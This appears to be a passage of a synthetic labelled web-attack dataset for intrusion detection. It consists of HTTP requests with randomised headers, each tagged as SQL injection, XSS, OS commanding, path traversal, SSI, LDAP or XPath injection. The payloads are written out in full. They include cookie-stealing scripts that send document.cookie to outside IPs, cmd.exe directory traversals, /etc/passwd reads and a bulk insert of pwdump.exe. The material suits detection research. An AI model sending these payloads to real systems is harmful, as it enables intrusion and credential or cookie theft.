e1ssTaa7rosreng=9&NvOnwope=occtVw4e&ieslg=ouVaD&m6aruzniN=pZMRFXLBLj&ste7pspO=tayusr tgwo ao &asthTi&rs=p&Slje2sinea2edhp=and    0<>(select count(*) from   zz where    eBvin<>)&nr=dn>e&yomochaSozS=isystemeechild object5&esq56=om&ss6RijetberbnI=eeechog35shutdownjosrmR3wtNylnposition&lyeeydnoGen=iWkf

End - Id: 41383
Start - Id: 35362
class: SqlInjection
GET /eFN/ootteatz/UWN_dropGKM7NBpv/ip.php?adaouleadptz=eCz9twOl1&o68qnNpa9X=390238079&o6eV-home=%27+++%29+++UN%2F**%2FION++ALL++SEL%2F**%2FECT+++%27abOft1sct%27%2C48592%2C1%2C%27Wi46%27%2C9+FROM++dures++++WHERE++%28+%27%27+++%3D++++%27&mfya5cecnZh9acm=2oobjectuel7t&e2=2087415075&dssimse=449&hmhid=12 HTTP/1.0
Host: 194.51.134.138
Connection: close
Accept: image/*;q=0.3, image/*;q=0.1, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 117.97.243.63
Cookie: 4ateradd3=nulloc
Cookie2: $Version="02"
Date: Mon, 18 Jul 05 24:44:56 UTC
ETag: W/"7KzDRrOZR0LNGoB"
Expect: 100-continue
From: ualuoer@tmohteyrt.be
If-Modified-Since: Tue, 11 Jul 06 04:36:43 GMT
If-Unmodified-Since: Thu, 13 Jan 05 20:58:48 CET
If-Match: *
If-None-Match: "EFK3G9kLLBgB-Kr"
If-Range: Fri, 12 Jun 09 07:01:46 CET
Max-Forwards: 456
MIME-Version: 6.8
Pragma: ddiaore='itlen'
Proxy-Authorization: Basic dGE1cjphaXR0bWFsdA==
Authorization: tatos 8nlSpeje=8eoUwrs
Range: 56564-256483,76-,27160-85
Referer: /nfbos/epem8/abkmu/mlzoc/srqiefTr.swf
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.9 (X11; U; SunOS sun4u 4.4; nB-mo; rv:7.5.2) Gecko/17581817
UA-CPU: 68000
UA-Disp: 937,2809,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 739x825
Via: 1.2 211.136.235.52:70051, 3.1 198.233.154.18
Transfer-Encoding: meOae
Upgrade: gerh/9.6
Warning: 789 200.25.198.254 "estsfttgsRlaip0Adgm" "Wed, 01 Jun 05 10:29:03 UTC"
X-Forwarded-For: 129.227.252.231
X-Serial-Number: 06713
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35362
Start - Id: 35030
class: SqlInjection
POST /iSTVFwJ.tiff? HTTP/1.1
Content-Length: 214
Content-Language: i2en6at,T,ijg
Content-Encoding: identity
Content-Location: /iedSezg7.swf
Content-MD5: YXBSeW15cjJhc25jdHdpcg==
Content-Type: application/x-www-form-urlencoded
Host: 13.228.255.29:80
Connection: oihis
Accept: text/html;q=0.4
Accept-Charset: windows-1258;q=0.8
Accept-Encoding: 
Accept-Language: ee-atvN;q=0.3, Vron-tnsve9im;q=0.7, uotaec-osApt;q=0.9, imh6kb-ifheja;q=0.9, cr6iaaIa-diep;q=0.0
Cache-Control: no-cache
Client-ip: 194.197.22.178
Date: Wed, 07 Sep 05 03:01:40 CET
If-Modified-Since: Sun, 21 Nov 04 23:45:06 GMT
If-Unmodified-Since: Sat, 01 Aug 09 20:51:16 UTC
If-Match: "ziift8YlYN5a.h7DnU"
If-Range: "lGTO.4Y0@PpUcnFk1VI"
Max-Forwards: 78
MIME-Version: 1.0
Proxy-Authorization: Basic bWR0cmxSeTpydUN0ZXRlcg==
Authorization: Basic dXJkb3M6T3NqZA==
Referer: http://sraarc.fr/sinc6Ri2/tneoe/ttaqx/gaotleA.cfm
User-Agent: Mozilla/1.6 (X11; U; Open BSD i586 6.8; Pu-ie; rv:9.2.0) Gecko/51294328
UA-CPU: 68000
----: --------------------

rautst9essl=63517452&aiuse9b6tv=rinput5&s8j6w=nEy8offi&7ot=8ozat&Oo7in6H=rnd&ehtu8SahHtte=bulk   insert     var9nat1e9    from   'pwdump.exe'     with    (codepage='RAW' )&ct=systemMbftpdgometatihlwn3

End - Id: 35030
Start - Id: 47475
class: XSS
GET /uunPfsaoabsthN/msotl/aKrzdvbMRZiCF/CZIyv.TOapi/-THPPhtacces2.dFEw.tiff?qgt64sseiydlt=34642&aIJ=eeaeu&eTeeneuaoeeomt=%3FMi%24&drtakyoleme=onrotasanfk&auoraahtHhGseHi=copyhtzi+p9a-&aegD=%3Cimg+++++src+%3D+%22+++javascript%3A%5Bwindow.open%28%27http%3A%2F%2F42.150.211.145%2Fie.aspx%27%2Bdocument.cookie%29%3B%5D+++%22+++%3E&hE=8h&g5swxs6nta9akm=es%40N%40Bm&cr6tHe=tplTao715&s1pt=htecm9oBgB&erijeutsep86=80&9cfnha=grTvvW&gIlsEmgngDl=divhdc HTTP/1.0
Host: www.tra6dcwl.net:2957
Connection: rfdcruS
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: rx-zxag, RfXed8l-nn, tw-eleosps, saesdb-eeN, nns-Io
Cache-Control: no-store
Client-ip: 253.160.80.201
Cookie: .-wayEeJJN=ue;Pdjithc=inethprtbodyatK ot6eo;zlasjxtrsi=r;vttlw=lpassthruo;3Waccept6PWD0UzL= cei ti;nd3ebhkddDsa=ea=services<t(
Cookie2: $Version="8"
Date: Sun, 31 Jul 05 14:53:07 CET
ETag: W/"lWkzjjgEDYcIKD0"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Thu, 23 Dec 04 24:43:25 UTC
If-Unmodified-Since: Fri, 06 Nov 09 01:41:20 UTC
If-Match: "tKj898Y8N3@ZMI5@M8"
If-None-Match: *
If-Range: *
Max-Forwards: 8265
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: /lmre2xsz/6ugq/lt7larO.jpeg
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 2.9; 1n-ke; rv:8.6.9) Gecko/47618397
UA-CPU: StrongARM
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 747x653
Via: FTP/8.2 112.13.42.250
Transfer-Encoding: CNRcI; teee=segcn0ot
Upgrade: rshhh0/1.3
Warning: 687 202.196.135.202:06 "idsvpmhabtisfehmuaet" "Sat, 02 Feb 08 06:06:39 UTC"
X-Forwarded-For: 166.174.206.86
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47475
Start - Id: 44053
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.e6rn0s.it:974
Connection: keep-alive
Accept: application/*, text/*;q=0.7
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, compress;q=0.9, gzip;q=0.2
Accept-Language: drhb3oa-e
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: pteY.BB9shutdownF=aD]r;oniL6tjseSal=36533564;gElsnA=L3h
Cookie2: $Version="43"
Date: Wed, 10 Sep 08 07:31:53 UTC
ETag: "a.HsjY6Z8t76nKz10U"
Expect: 100-continue
From: 2eEemxwf@fedDctiae.gov
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Tue, 27 Jan 04 20:34:39 UTC
If-Match: *
If-None-Match: "c3YryAjjM.ugyelYJ9"
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 8
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest response="fEbfBB7c0E29b479e09d8FeF2679E7e3"
Authorization: osLn 3ee8aia=uEephmnw
Range: -0
Referer: /E7css6.gz
TE: trailers,chunked
Trailer: Range
User-Agent: a5S8cF0Vx http://www.h6rhAsko.uk
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: HTTP/7.1 15.255.155.128, 5.6 www.5nubSctu.jpg
Transfer-Encoding: 8ehus
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 201.145.60.10
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44053
Start - Id: 46039
class: PathTransversal
GET /anthhrgmib8f8g/lxetrlsA3gAgebrO/OINr91positionA/n6WEopen84qFA/q6-hVtDL6TS/c9VwXGABRJ/autdaOyeaeNrb77cedee/Er0/a2p7are.png?enisnaHmruaHbo=65&phpJ@cwj=t+7%24es+eHes HTTP/1.0
Host: 248.216.244.24
Connection: nettp
Accept: */*;q=0.7
Accept-Charset: windows-1252;q=0.9, iso-8859-7
Accept-Encoding: 
Accept-Language: \.\.\/\.\.\/etc\/passwd
Cache-Control: only-if-cached
Client-ip: 213.102.13.102
Cookie: iinatoqy1=);eierehs=Arlinsertm;oehqh=20436595;afehzefx=h"tuki| a"6mriobject
Cookie2: $Version="01"
Date: Sat, 20 Mar 04 13:37:11 GMT
ETag: W/"WDieNzqnzdhyTvCJ1"
Expect: na2smeai
If-Modified-Since: Sun, 25 Dec 05 23:04:40 GMT
If-Unmodified-Since: Sat, 12 Jul 08 05:47:21 GMT
If-Match: *
If-None-Match: "dWlnJyETdDrI6xRXwZZ"
If-Range: *
Max-Forwards: 1
Pragma: no-cache
Authorization: ri5xnr gMenz=qdslean
Range: 96418-,-1,193-
Referer: http://www.serkeetk.gov/resuirs/tajroi/e8bct/a9hhun2/zsuz.asp
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: Mozilla/3.2 (compatible; 3udo; Unix; rt3dienU3t)
UA-Pixels: 376x6038
Via: 1.8 www.qtt5naE.shtml, 9.3 www.oiNoi2U.html
Upgrade: n41se/5.7
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46039
Start - Id: 36618
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.iuzY.fr
Connection: th28Anl
Accept: image/gif, text/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: mctqKnh-jt, iNt-77iip8;q=0.8, 1fmepie-brcp;q=0.7
Cache-Control: no-transform
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="2"
Date: Thu, 14 Sep 06 09:05:24 CET
ETag: "19NZywTcR7rRSt-Yo"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Mon, 04 Jan 10 03:04:48 CET
If-Unmodified-Since: Fri, 03 Nov 06 11:51:22 UTC
If-Match: *
If-None-Match: *
If-Range: "Hy7Yen2Nw_C8liEHvP"
Max-Forwards: 116
MIME-Version: 1.9
Pragma: o='Ui'
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Digest nc=aeCb2501
Range: 8050-
Referer: http://www.rroen.org/smiP/hni2elth/dteUtvb/rtxaax.conf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: slI6nmzc/7.4.1.4.0
UA-CPU: MIPS
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 www.a1tuteos.gif, FTP/8.5 167.177.49.173:44, 8.0 www.rctpen3.htm
Transfer-Encoding: deflate
Upgrade: itsMSt/6.1, nw6taL/4.3
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36618
Start - Id: 39426
class: SSI
GET /trbnabuleanhrDs/eaC6.php4?3hIhOivionfhc=%3Ei9documentrSbgsound5IesrreplacelDoR&N9xzFXDYZXG5=%3C%21--%23email+fromhost%3D%22www.HmCtwbqc.com%22+tohost%3D%22mailbox.8iWj.com%22+message%3D%22ereie+qe1sehp+hbtre+rSvnaU%22+fromaddress%3D%22vmcg.com%22+toaddress%3D%22ioLl.lsa.com%22+subject%3D%22p%22+sender%3D%22srri.com%22+replyto%3D%22attia.com%22+cc%3D%22yhrS%22+inreplyto%3D%22m6+Tntm+rtueu%22+id%3D%22eNtmail%22+--%3E&ve1Jq1M@xmf=9%24c5igohomee&iminvh=61&Vsed=ulkti7e%3Bptys%3B9e&trXm=aVIltaT7RKBp HTTP/1.1
Host: 199.151.254.21
Connection: close
Accept: */*;q=0.4
Accept-Charset: ks_c_5601-1987, iso-8859-6;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 126.45.36.156
Cookie: aTrioisa=r4f1;tmpeYls0=dnwr4hB2fs;eWtVgzzy=t0a3@l;68=76953076;Cdy4=rI>lh qot61rses1nda
Cookie2: $Version="308"
Date: Tue, 27 May 08 09:06:24 UTC
ETag: W/"L9F0Hm1q-VFB2Ll@_A9"
Expect: 100-continue
From: w3by414@hseh.net
If-Modified-Since: Thu, 18 Feb 10 12:31:28 GMT
If-Unmodified-Since: Wed, 02 Apr 08 16:11:58 CET
If-Match: "aB5KlgUag0TmNfM"
If-None-Match: "iS80tx7AB5cEE5iJ5e"
If-Range: *
Max-Forwards: 6813
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic c2FsZ250OjlzcDB0
Range: -07524
Referer: /rxrr5shi/ADem/zuOiue/drab4ih.pdf
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.8 (X11; U; Unix 8.9; ss-6y; rv:2.8.7) Gecko/63534843
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3896x417
Via: 1.4 www.i6Bq.gif:29, 8.9 117.112.188.30, 8.2 www.morecd.jpeg
Transfer-Encoding: identity
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39426
Start - Id: 47360
class: XSS
GET /rmmnvteGyftfsteacb/oRTBXY74JvK/re7Ihz0/ra2MjVmxhujL/zsei5ttinhhEy2oOae/dPZzF.jpeg?I@mm.wJj3Xh=qaefoo2ehrgfl&terytdtt1nsr8on=930&oooe=4i8ao%29&f8md1ig=0624638&npyemIraalore=tlDnahs6AVtr&EievnWHpM=p7w%22+++%3E%3Cbody%2520onload%3Dalert%28document.cookie%29%3B++++%3E&etaleh=nD8deehduetelaowmt&eldlrxrs=h1ahdC&0alsracyoeaxj=geotewindow.openY8%3Bi&Ehy=aijaltsetpoibjaioj&q6d75sqoec=c%24gNncopy HTTP/1.1
Host: www.iqtyqthdwT.it
Connection: keep-alive
Accept: image/*, video/quicktime;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.8, utf-7;q=0.2, shift_jis
Accept-Encoding: 
Accept-Language: 8ss-hidtui;q=0.0
Cache-Control: only-if-cached
Client-ip: 30.118.108.110
Cookie: ywncaie=7ht6v;tt=araGe;wtw=qO1tNs9bWqRO;nm5aaisiehcj=ayas;Hhtreehaoan=524903638;havinghSYIQj=3636
Cookie2: $Version="10"
Date: Sun, 01 Apr 07 21:15:54 UTC
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: rnyes=dheroAo;tunizx
From: 1vfrn@reeDe.org
If-Modified-Since: Thu, 08 Oct 09 19:54:55 CET
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Apr 10 21:15:23 GMT
Max-Forwards: 93
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM ZW5sZ3NydDNhZWtuOWxtZmFhUm5pVHJvZXNlZW9hc2FsZGlkbmRuZWh6bmU=
Authorization: NTLM YmE3bXJlc21lbGVsaVJlOWpvZWMxdG80c2VtbWVydDFpaXV6bGg4b25mZWZhZHk=
Range: -066761,152-
Referer: http://syqh.gov/Mgtte/oR1abrw/tmns.conf
TE: gzip
Trailer: Trailer
User-Agent: gagZ0Iz (4J_g3CrX@)
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 605x5902
Via: rcrn/3.4 www.iTau.css
Transfer-Encoding: compress
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47360
Start - Id: 44984
class: PathTransversal
GET /ai5ib/lGTuK6iB_t_3c3yE.Pz/sQ3@yPnCp.SEaR/XQR_Ohaving1HVE13accept/rAiBa/autoexecZ1/l5ohiSsoef/m-n07F/iero58x1euphetJhse.mdb?tnne=lanfgnr&re=script%5D++eacmdn9nrpisock_streamo&adktarb=..%2F..%2F..%2Fnttoes%2Fadmin.txt&geC8cgicptIbose=yns&ee6oteahv5=03&ps3atja=dx HTTP/1.0
Host: 66.145.84.7:9963
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-roman
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: DwasirA='Q'
Client-ip: 223.133.197.156
Cookie: diah=o+N9e9+Es ;qqs
Cookie2: $Version="1"
Date: Sun, 11 Mar 07 12:44:15 CET
ETag: W/"fWTDtBv0S_B@ST7"
Expect: 100-continue
From: ytsw@heeaiueil.de
If-Modified-Since: Wed, 11 Aug 04 02:16:38 CET
If-Unmodified-Since: Tue, 21 Mar 06 23:00:47 GMT
If-Match: "U.6Cp08EVmeBk2O0"
If-None-Match: "3MM8ouQr5OiK1-pX"
If-Range: Thu, 04 Dec 08 06:00:48 CET
Max-Forwards: 82
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM NGJFaW1lVGVlbG80ZG1lTnNlNmZiaGhzOGhlY2N5aXNndFRsc1RzNnFpbw==
Authorization: Digest qop=sarR
Range: 73-,999598-14093
Referer: http://www.lgRe7naA.be/uiktHfi/trdo/9cnenn/nnebl6Qu.zip
TE: trailers,chunked;q=0.5
Trailer: Accept-Encoding
User-Agent: Mozilla/0.2 (X11; U; Linux i586 1.7; Ey-iE; rv:0.7.4) Gecko/89594535
UA-CPU: 68000
UA-Disp: 272,747,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 0.0 157.187.125.92, 4.8 www.rrtdsmo.js:084, gvou/6.7 64.107.225.99
Transfer-Encoding: gzip
Upgrade: aEeIr6/5.8, vitna/3.7
Warning: 066 www.nilrhde.jpg "jrIghnmascnrodusoxo" "Thu, 06 Oct 05 03:19:48 UTC"
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 8606404239
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44984
Start - Id: 39027
class: LdapInjection
PUT /eavK2.JCy9Uu6/tlRgMu5.VaaqJ/or/axp_GEE8Mq/aRqsnhs/RvIimg80/neik/S096cu/tZMqF.nJe.asp? HTTP/1.1
Content-Length: 207
Content-Language: rn
Content-Encoding: identity
Content-Location: http://iiGnm.org/6jiznrS/ejUdgmr/ah6eerlo/atLro/5IARl.pl
Content-MD5: THJvbmJuYWVuZWxhb2lvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Mar 07 22:55:08 GMT
Last-Modified: Wed, 06 Oct 04 20:32:43 CET
Host: www.eddanbwet.de
Connection: close
Accept: image/jpeg;q=0.6, text/xml, audio/*
Accept-Charset: iso-8859-6;q=0.9, x-mac-ce;q=0.6
Accept-Encoding: )    ( |   (displayName=had*)    (name    =  had*)(mail=had*   )
Accept-Language: 4lhtM-urjctee;q=0.0, p-9kn, hadsbgt-bsbae;q=0.7
Cache-Control: no-store
Client-ip: 42.170.193.199
Cookie: wysiphe7wa4ee=ylcw poM  copy4eaemtdz ;Rnsndnh=96300268;1h6lN9TeA=atwFcattep;hrccd1nRfmlwnn=1cene6ntiottu
Cookie2: $Version="35"
Date: Fri, 10 Mar 06 01:32:18 CET
ETag: "iLW@6vsQxq499o6Y"
Expect: 100-continue
From: atitro@THsros.uk
If-Modified-Since: Mon, 16 Jun 08 13:36:23 CET
If-Unmodified-Since: Sun, 30 Jul 06 08:56:36 CET
If-Match: "mXd59_-pehX3HAJ3"
If-None-Match: *
If-Range: Sun, 13 Nov 05 08:54:20 CET
Max-Forwards: 2890
MIME-Version: 9.1
Pragma: no-cache
Authorization: Basic bG1zaWVvZzpvemNlb3M=
Referer: /oniea7u/bvhosl/fjmse/uqleer/sWlnhy.tar
TE: chunked;q=0.7,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/8.6 (compatible; MSIE 9.9; Open BSD i386; meRdmnioo; 0ateA)
UA-CPU: PowerPC
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7332x461
Via: 4.8 www.InhWeh.tiff
Transfer-Encoding: identity
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -----------------
~~~~~: ~~~~~~~~~~~

pIhn=iregisaNtuub6stp5a&RX0C=teconiKndubebeaonm&au4uye=74500556&5sOelRa=h>&ladsEreaeRew=atyawhoanoS2h&cn1bRq=280483842&zaeeig=10914737&s0O0=bHxrnpfu4lk|a&fiyemsemd6odt=hAy&frsqmn=gi9s&se9pit1yriTgsja=tgt

End - Id: 39027
Start - Id: 44408
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 252.236.166.53:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 136.18.89.145
Cookie: ssbmna=5
Cookie2: $Version="3"
Date: Fri, 04 Aug 06 19:22:51 UTC
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: 100-continue
From: on76@weg6se.uk
If-Modified-Since: Thu, 12 Mar 09 09:32:12 GMT
If-Unmodified-Since: Wed, 25 Jul 07 17:32:40 CET
If-Match: *
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: "tSAH3lz8Majy6XN"
Max-Forwards: 4584
MIME-Version: 6.5
Pragma: iee99='h'
Proxy-Authorization: ewtxee iOsamfm=Clcele
Authorization: oigi5 uil1eat=nanstcl
Range: 07334-,0929-,-17620
Referer: /6aa5/nrDluor/tneuaG/adoaisa/p5gsmhl.sh
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 9.1; iy-yo; rv:2.7.5) Gecko/32685060
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6396x837
Via: 6.1 125.113.168.19, FTP/3.8 www.HnTdo.jpeg, 8.5 171.237.138.74
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 207.201.80.136
X-Serial-Number: 16197588346334119700
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44408
Start - Id: 47936
class: XSS
GET /ezd/8D3Qdy8G@pzOPELvKXk/ii/O4yBT@CdshutdownjOID@.tiff?1y=8932815&e5ldsycetrt=iRt&@hVhYHR=aeq%5C&neayaHztetel=pformixd&6odsDsc2ceta9un=12&.8lIAJrAUJXA=fsl%3Fdivub&e3eE64lruu7=WhqM%2Fnvboot.inipasswdtmatir&lgta=%3C%21--+--+--%3E%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F169.200.95.75%2Friit.php4%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E&ctnnosvme=%26+ew&qwI72eEiqnme=81i4glro8koOea9m HTTP/1.1
Host: www.tdsRe.cz
Connection: keep-alive
Accept: audio/x-wav;q=0.8, text/*
Accept-Charset: koi8, x-mac-greek, x-mac-roman;q=0.7
Accept-Encoding: identity, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 99.239.86.40
Cookie: oek2jwtetpxq=oipwau;yiair1=e;F4yX=1;tmqqdeittreteea=ep)i;ceemocacd5Dzuaq=vcps dwinnta5 /jbpe?u9ej;evu1C@Gz5telnet2= ostyle1
Cookie2: $Version="613"
Date: Sun, 05 Feb 06 18:46:01 CET
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Sat, 11 Mar 06 13:23:55 UTC
If-Unmodified-Since: Tue, 06 Jun 06 23:18:59 CET
If-Match: *
If-None-Match: *
If-Range: "dui5KMZulNUq4Bq8v7vG"
Max-Forwards: 0191
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: Basic ZGEydGZ1ODpydWxnYXV5
Range: 986919-,798-764614
Referer: /7faesOo/ecn8euae/sneR8kiW/ik0hiah.asmx
TE: trailers,trailers,gzip;q=0.3
Trailer: Max-Forwards
User-Agent: Mozilla/9.4 (compatible; htylZ; Mac OS X; s6eehannqr; ean5; 9nzetr)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x206
Via: casA3e/9.5 www.eafpos.jpg, 6.6 87.216.24.52
Transfer-Encoding: fL6YG
Upgrade: revs/4.9
Warning: 071 42.137.22.86 "repdureeuls8tttE" "Thu, 25 Jan 07 02:00:21 CET"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47936
Start - Id: 35739
class: XPathInjection
GET /eWU3N4/af7.ja8c0Qu/eAy0@hrPeS2Q@/tarJZrEq0YxWEVMW3/Sdas/mH8ZUKOgV/aUtw.css?aa5vhwe4OiyeG=nriotoew%27+++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++++%27lq%27++%3D%27 HTTP/1.0
Host: www.tqwusaean.fr
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: wyaridy=ire
Client-ip: 247.151.95.229
Cookie: Lsten9AaTR=brtdrf
Cookie2: $Version="4"
Date: Sat, 09 Aug 08 16:36:09 CET
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 24 Jan 07 14:49:37 CET
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="ta7oAu"
Authorization: Digest nonce
Range: 820401-
Referer: /exuh/lniinss/soYpl/ielco.mdb
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Seetth8rbB
UA-CPU: x86
UA-Disp: 453,3007,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: HTTP/3.3 167.98.96.252
Transfer-Encoding: gzip
Upgrade: 7ln/1.2, hsmh/6.3, ueo/9.6, 4r6eM7/9.5
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 61503803
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35739
Start - Id: 35261
class: SqlInjection
GET /sock_stream1awzUB.IU1/ohomehregrEnab7ew9se/7.Qb9oG/9U283VjV_ZmyF0/uu5iUa.uslYsv-4-e5L/UNYgformLrYLZli/l9tfecebxdtGbeagn/r6JnWlkDP5F7Z/l0ntl/e6AU3rmp4gf2.js?nmacs=hcg&zhoh0llseaT=ufh&tnsneoenlArde=d%25h3&3HfOJqAjITH=aEuusTKO8e6&aEanehepnt=%27+++OR+++++%27app%27+++++%3E++++%27S&Zev=82&Svgl4ef=i6afynrpewrttf&as4eaDherap=0gtra&er=whi2-k HTTP/1.0
Host: 169.105.21.124:72615
Connection: saas0ril
Accept: image/png;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ryutg-hsee, fsnsBsqs-mca
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: Srdeioh=s%
Cookie2: $Version="73"
Date: Sun, 18 May 08 22:39:14 CET
ETag: W/"NBtBFUHwyb@U6oz"
Expect: er37ac=rtaefe;celo
From: ieogO97c@1xtO.uk
If-Modified-Since: Wed, 07 Sep 05 04:20:40 UTC
